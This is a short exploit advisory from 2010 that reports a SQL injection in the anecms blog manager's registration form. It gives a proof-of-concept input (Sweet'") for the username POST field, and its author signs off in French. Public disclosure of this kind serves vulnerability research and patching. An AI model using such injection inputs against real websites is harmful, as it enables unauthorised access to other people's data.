############################################################################
#                                                                          #
# Exploit Title: anecms SQli                                               #
#                                                                          #
# Date: 23/08/2010                                                         #
#                                                                          #
# Author: Sweet                                                            #
#                                                                          #
# Contact : charif38@hotmail.fr                                            #
#                                                                          #
# Software Link: anecms.com                                                #
#                                                                          # 
# Download: anecms.com/anecms.zip                                          #
#                                                                          # 
# Version: All                                                             #
#                                                                          #
# Tested on: WinXp sp3                                                     #
# Description : anecms is an open source blog manager                      # 
#                                                                          #
#                                                                          #
#                                                                          #
############################################################################

Sqli:

The POST variable username has been set to sweet'" on http://vulnerable.com/register/next

Poc:

http://www.example.com/register/next

username = Sweet'"

password = test

re password = test

email = charif38@hotmail.fr

then register :]

screen : http://img830.imageshack.us/img830/1213/anecm.jpg









Saha Ftourkoum et 1,2,3 viva L'Algerie :))